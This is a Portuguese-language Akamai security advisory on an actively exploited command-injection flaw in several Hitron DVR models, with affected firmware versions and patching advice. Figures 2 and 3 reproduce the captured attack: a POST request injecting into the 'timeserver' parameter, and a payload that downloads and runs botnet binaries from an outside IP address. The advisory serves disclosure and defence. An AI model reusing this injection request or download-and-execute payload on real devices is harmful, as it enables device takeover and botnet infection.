X

Precisa de computação em nuvem? Comece agora mesmo

Logotipo da Akamai
+1-8774252624
+1-8774252624
Login
Control Center
Acesse a plataforma Akamai
Cloud Manager
Gerencie seus recursos de nuvem
Experimente a Akamai
Você está sob ataque?
Login
Control Center
Acesse a plataforma Akamai
Cloud Manager
Gerencie seus recursos de nuvem

Vulnerabilidade explorada ativamente nos DVRs Hitron: corrigida, patches disponíveis

Akamai Wave Blue

escrito por

Aline Eliovich, Kyle Lefton, Chad Seaman, e Larry Cashdollar

January 30, 2024

Aline Eliovich

escrito por

Aline Eliovich

Com seis anos de experiência na área de segurança, Aline Eliovich trabalha atualmente como pesquisadora da equipe de resposta de inteligência de segurança da Akamai. Estudou Ciência da Computação no Holon Technology Institute. Aline gosta de usar diferentes métodos de Open Source Intelligence (OSINT) em sua pesquisa.

Onda azul da Akamai

escrito por

Kyle Lefton

Kyle Lefton é estagiário de pesquisa de segurança na equipe de resposta de inteligência de segurança da Akamai. Anteriormente analista de inteligência do Departamento de Defesa, Kyle tem experiência em defesa cibernética, pesquisa de ameaças e contra-inteligência que abrange vários anos. Ele se orgulha de investigar ameaças emergentes, da pesquisa de vulnerabilidades e do mapeamento de grupos de ameaças. Em seu tempo livre, ele gosta de passar um tempo com amigos e familiares, jogar jogos de estratégia e fazer caminhadas ao ar livre.

Chad Seaman headshot

escrito por

Chad Seaman

Chad Seaman é um pesquisador principal de segurança e líder da equipe de resposta de inteligência de segurança da Akamai. Ele orgulhosamente se refere a si mesmo como um “caçador de lixo na Internet” e gosta de vasculhar a lama que encontra lá. Chad começou sua carreira como programador e, depois de conhecer os temas de segurança, exploração e forense por meio de investigações de violação, a segurança rapidamente se tornou seu trabalho preferido. Ele agora passa seu tempo envolvido em investigações de malware, engenharia reversa, pesquisa de vulnerabilidade, DDoS e investigações de crimes cibernéticos. Gosta de pilotar aviões, furar papéis à distância e estar na natureza, de preferência no mato, fazendo trilha com sua moto.

Larry Cashdollar

escrito por

Larry Cashdollar

Larry W. CashDollar trabalha na área de segurança como pesquisador de vulnerabilidade há mais de 18 anos e atualmente é membro da equipe de resposta a incidentes de segurança da Akamai Technologies. Estudou Ciência da Computação na Universidade do Sul do Maine. Larry documentou mais de 150 CVEs e até apresentou sua pesquisa no BSIS Boston, OWASP Rhode Island e Defcon. Ele gosta do ar livre e de reconstruir motores de motocicletas de pequeno porte em seu tempo livre.

Como parte da descoberta da InfectedSlurs, a SIRT da Akamai identificou vulnerabilidades em vários modelos de dispositivos DVR Hitron que são exploradas ativa e livremente.

Resumo executivo

É importante saber

Como parte da descoberta da InfectedSlurs, a SIRT da Akamai identificou vulnerabilidades em vários modelos de dispositivos DVR Hitron que são exploradas ativa e livremente. Os dispositivos Hitron são fabricados na Coreia do Sul pela Hitron Systems.

A vulnerabilidade permite que um invasor autenticado obtenha injeção de comando do sistema operacional com uma carga útil entregue por meio de uma solicitação de POST à interface de gerenciamento. Em sua configuração atual, ele está utilizando credenciais padrão do dispositivo nas cargas úteis capturadas.

As versões de dispositivos e firmware afetados são:

  • DVR HVR-4781: versões 1.03 a 4.02

  • DVR HVR-8781: versões 1.03 a 4.02

  • DVR HVR-16781: versões 1.03 a 4.02

  • DVR LGUVR-4H: versões 1.02 a 4.02

  • DVR LGUVR-8H: versões 1.02 a 4.02

  • DVR LGUVR-16H: versões 1.02 a 4.02

O fornecedor (Hitron Systems) lançou novas versões de firmware para solucionar as vulnerabilidades. Ele recomenda atualizar para a versão de firmware ≥ 4.03 todos os modelos afetados o mais rápido possível. As recomendações também foram publicadas pela CISA e KISA. A KISA também divulgou recomendações relacionadas aos CVEs individuais, que podem ser encontradas nos seguintes links:

Exploração observada

No final de outubro de 2023, os analistas da SIRT da Akamai notaram um aumento na atividade em nossos honeypots visando uma porta TCP raramente explorada. As sondas eram de baixa frequência e pareciam tentar primeiro uma autenticação por meio de solicitação POST para o arquivo /cgi-bin/system_ntp.cgi (Figura 1), seguida de uma tentativa de exploração de injeção de comando (Figura 2).  Os dispositivos visados são os dispositivos DVR da Hitron Systems, que são vulneráveis ao RCE por meio de injeção de comando (Figura 3). Uma vez autenticado, o invasor visa a vulnerabilidade de injeção de comando no parâmetro do timeserver por meio de uma solicitação POST para /cgi-bin/system_ntp.cgi.

  URL: /cgi-bin/system_ntp.cgi

  POST BODY:
  enc=11&ip=[targeted IP]&username=[REDACTED]&password=[REDACTED]

Fig. 1: Tentativa de autenticação

  URL: /cgi-bin/system_ntp.cgi

  POST BODY:
  lang=ja&useNTPServer=1&synccheck=1&public=0&timeserver=[RCE 
  PAYLOAD]&interval=60&enableNTPServer=1

Fig. 2: Tentativas de exploração

  curl+http://45.142.182.96/spl/mips+-O;+chmod+777+mips;+./mips+kdvr;curl+http://45.142.182.96/spl/x86+-O;+chmod+777+x86;+./x86+kdvr;curl+http://45.142.182.96/spl/mpsl+-O;+chmod+777+mpsl;+./mpsl+kdvr;curl+http://45.142.182.96/spl/arm+-O;+chmod+777+arm;+./arm+kdvr;curl+http://45.142.182.96/spl/arm5+-O;+chmod+777+arm5;+./arm5+kdvr;curl+http://45.142.182.96/spl/arm6+-O;+chmod+777+arm6;+./arm6+kdvr;curl+http/45.142.182.96/spl/arm7+-O;+chmod+777+arm7;+./arm7+kdvr

Fig. 3: Carga útil RCE capturada

Proteção

Os usuários de DVRs Hitron que estejam executando dispositivos afetados por essa vulnerabilidade devem atualizar imediatamente para as versões de firmware mais recentes disponíveis (≥ 4.03) que corrigem a vulnerabilidade de RCE.  

Além disso, para se proteger contra essa e futuras ameaças, várias medidas de segurança devem ser implementadas. Antes de mais nada, para aumentar a segurança, as organizações e os indivíduos que usam os dispositivos afetados devem alterar imediatamente suas credenciais de login padrão. O monitoramento regular do tráfego de rede e dos registros pode ajudar na detecção precoce de atividades suspeitas. A rápida instalação de patches de segurança e atualizações do fabricante do dispositivo é essencial para solucionar a vulnerabilidade identificada.

A colaboração com pesquisadores de segurança, provedores de inteligência contra ameaças e colegas do setor pode ajudá-lo a manter-se informado sobre ameaças e vulnerabilidades recentes. Por fim, manter um inventário atualizado dos dispositivos conectados e implementar segmentação de rede pode limitar o possível impacto desses ataques.

Conclusão

Resolver os problemas de segurança identificados nos sistemas Hitron e nos dispositivos associados requer uma abordagem multifacetada, combinando conscientização do usuário, aplicação imediata de patches, monitoramento proativo e colaboração dentro da comunidade de cibersegurança. Ao adotar essas medidas, as organizações e os indivíduos podem reduzir significativamente os riscos apresentados pela atividade mal-intencionada observada.

Fique atento

Para se manter atualizado sobre ameaças e outras descobertas da SIRT e de outros grupos de pesquisa da Akamai sobre segurança, siga-nos no X (Antigo Twitter) ou confira nosso hub SIG.

A SIRT da Akamai gostaria de agradecer ao pessoal da CISA, da US-CERT e da KISA por sua assistência em relatar essas vulnerabilidades aos fornecedores.

Veja mais pesquisas
Akamai Wave Blue

escrito por

Aline Eliovich, Kyle Lefton, Chad Seaman, e Larry Cashdollar

January 30, 2024

Aline Eliovich

escrito por

Aline Eliovich

Com seis anos de experiência na área de segurança, Aline Eliovich trabalha atualmente como pesquisadora da equipe de resposta de inteligência de segurança da Akamai. Estudou Ciência da Computação no Holon Technology Institute. Aline gosta de usar diferentes métodos de Open Source Intelligence (OSINT) em sua pesquisa.

Onda azul da Akamai

escrito por

Kyle Lefton

Kyle Lefton é estagiário de pesquisa de segurança na equipe de resposta de inteligência de segurança da Akamai. Anteriormente analista de inteligência do Departamento de Defesa, Kyle tem experiência em defesa cibernética, pesquisa de ameaças e contra-inteligência que abrange vários anos. Ele se orgulha de investigar ameaças emergentes, da pesquisa de vulnerabilidades e do mapeamento de grupos de ameaças. Em seu tempo livre, ele gosta de passar um tempo com amigos e familiares, jogar jogos de estratégia e fazer caminhadas ao ar livre.

Chad Seaman headshot

escrito por

Chad Seaman

Chad Seaman é um pesquisador principal de segurança e líder da equipe de resposta de inteligência de segurança da Akamai. Ele orgulhosamente se refere a si mesmo como um “caçador de lixo na Internet” e gosta de vasculhar a lama que encontra lá. Chad começou sua carreira como programador e, depois de conhecer os temas de segurança, exploração e forense por meio de investigações de violação, a segurança rapidamente se tornou seu trabalho preferido. Ele agora passa seu tempo envolvido em investigações de malware, engenharia reversa, pesquisa de vulnerabilidade, DDoS e investigações de crimes cibernéticos. Gosta de pilotar aviões, furar papéis à distância e estar na natureza, de preferência no mato, fazendo trilha com sua moto.

Larry Cashdollar

escrito por

Larry Cashdollar

Larry W. CashDollar trabalha na área de segurança como pesquisador de vulnerabilidade há mais de 18 anos e atualmente é membro da equipe de resposta a incidentes de segurança da Akamai Technologies. Estudou Ciência da Computação na Universidade do Sul do Maine. Larry documentou mais de 150 CVEs e até apresentou sua pesquisa no BSIS Boston, OWASP Rhode Island e Defcon. Ele gosta do ar livre e de reconstruir motores de motocicletas de pequeno porte em seu tempo livre.

Publicações do blog relacionadas

Stiv Kupchik, pesquisador da Akamai, encontrou uma nova vulnerabilidade de elevação de privilégio (EoP) no cliente de registro remoto da Microsoft.
Stiv Kupchik, pesquisador da Akamai, encontrou uma nova vulnerabilidade de elevação de privilégio (EoP) no cliente de registro remoto da Microsoft.

Chamada e registro — ataque de retransmissão ao cliente WinReg RPC

October 19, 2024
Os pesquisadores da Akamai analisam uma nova vulnerabilidade que pode ser explorada para levar a ataques de elevação de privilégio contra computadores Windows.
por Stiv Kupchik
Leia mais
Esta derrubada é um grande passo para tornar a internet um lugar mais seguro.
Esta derrubada é um grande passo para tornar a internet um lugar mais seguro.

Derrubada do Anonymous Sudan: o papel da Akamai

October 16, 2024
O Departamento de Justiça anunciou a derrubada do Anonymous Sudan. Leia como a Akamai ajudou neste processo.
por Akamai SIRT
Leia mais
Este mês, temos um total de 117 CVEs em 60 componentes diferentes. Destas, três são críticas.
Este mês, temos um total de 117 CVEs em 60 componentes diferentes. Destas, três são críticas.

Perspectiva da Akamai sobre a Patch Tuesday de outubro de 2024

October 11, 2024
São muitas CVEs, mas não tenha medo: deixe para o Halloween. Este mês, temos um total de 117 CVEs e duas vulnerabilidades exploradas em uso.
por Akamai Security Intelligence Group
Leia mais